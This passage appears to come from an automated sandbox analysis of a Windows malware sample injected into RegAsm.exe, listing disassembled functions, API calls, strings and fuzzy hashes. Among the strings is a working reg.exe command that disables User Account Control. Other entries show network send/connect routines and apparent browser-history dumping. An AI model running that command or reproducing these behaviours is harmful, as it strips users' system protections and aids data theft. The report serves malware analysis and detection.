              • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
              • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
              Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
              • CloseHandle.KERNEL32(?), ref: 004077AA
              • CloseHandle.KERNEL32(?), ref: 004077AF
              Strings
              • C:\Windows\System32\cmd.exe, xrefs: 00407796
              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandle$CreateProcess
              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
              • API String ID: 2922976086-4183131282
              • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
              • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
              • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
              • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
              Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
              Download Yara Rule
              Strings
              • SG, xrefs: 004076DA
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              • API String ID: 0-97610266
              • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
              • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
              • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
              • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
              Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
              • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
              • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
              • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
              • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
              Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
              • CloseHandle.KERNEL32(?), ref: 00405140
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
              • String ID: KeepAlive | Disabled
              • API String ID: 2993684571-305739064
              • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
              • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
              • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
              • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
              Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
              • Sleep.KERNEL32(00002710), ref: 0041AE07
              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: PlaySound$HandleLocalModuleSleepTime
              • String ID: Alarm triggered
              • API String ID: 614609389-2816303416
              • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
              • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
              • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
              • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
              Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
              • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
              • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
              Strings
              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Console$AttributeText$BufferHandleInfoScreen
              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
              • API String ID: 3024135584-2418719853
              • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
              • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
              • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
              • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
              Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
              • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
              • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
              • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
              Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • _free.LIBCMT ref: 00444E06
              • _free.LIBCMT ref: 00444E1D
              • _free.LIBCMT ref: 00444E3C
              • _free.LIBCMT ref: 00444E57
              • _free.LIBCMT ref: 00444E6E
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$AllocateHeap
              • String ID:
              • API String ID: 3033488037-0
              • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
              • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
              • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
              • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
              Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 004493BD
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00449589
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID:
              • API String ID: 1286116820-0
              • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
              • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
              • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
              • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
              Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
              • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
              • String ID:
              • API String ID: 4269425633-0
              • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
              • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
              • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
              • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
              Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
              • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
              • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
              • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
              Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
              • __alloca_probe_16.LIBCMT ref: 004511B1
              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
              • __freea.LIBCMT ref: 0045121D
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
              • String ID:
              • API String ID: 313313983-0
              • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
              • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
              • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
              • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
              Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
              • _free.LIBCMT ref: 0044F3BF
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
              • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
              • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
              • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
              Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
              • _free.LIBCMT ref: 004482D3
              • _free.LIBCMT ref: 004482FA
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
              • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
              • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
              • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
              Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 004509D4
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 004509E6
              • _free.LIBCMT ref: 004509F8
              • _free.LIBCMT ref: 00450A0A
              • _free.LIBCMT ref: 00450A1C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
              • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
              • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
              Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00444066
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00444078
              • _free.LIBCMT ref: 0044408B
              • _free.LIBCMT ref: 0044409C
              • _free.LIBCMT ref: 004440AD
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
              • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
              • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
              Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
              Download Yara Rule
              APIs
              • _strpbrk.LIBCMT ref: 0044E738
              • _free.LIBCMT ref: 0044E855
                • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
              • String ID: *?$.
              • API String ID: 2812119850-3972193922
              • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
              • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
              • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
              • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
              Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
              Download Yara Rule
              APIs
              • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateFileKeyboardLayoutNameconnectsend
              • String ID: XQG$NG$PG
              • API String ID: 1634807452-3565412412
              • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
              • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
              • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
              • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
              Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: `#D$`#D
              • API String ID: 885266447-2450397995
              • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
              • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
              • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
              • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
              Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
              • _free.LIBCMT ref: 00443540
              • _free.LIBCMT ref: 0044354A
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              • API String ID: 2506810119-472202380
              • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
              • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
              • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
              • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
              Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
              • String ID: /sort "Visit Time" /stext "$0NG
              • API String ID: 368326130-3219657780
              • Opcode ID: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
              • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
              • Opcode Fuzzy Hash: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
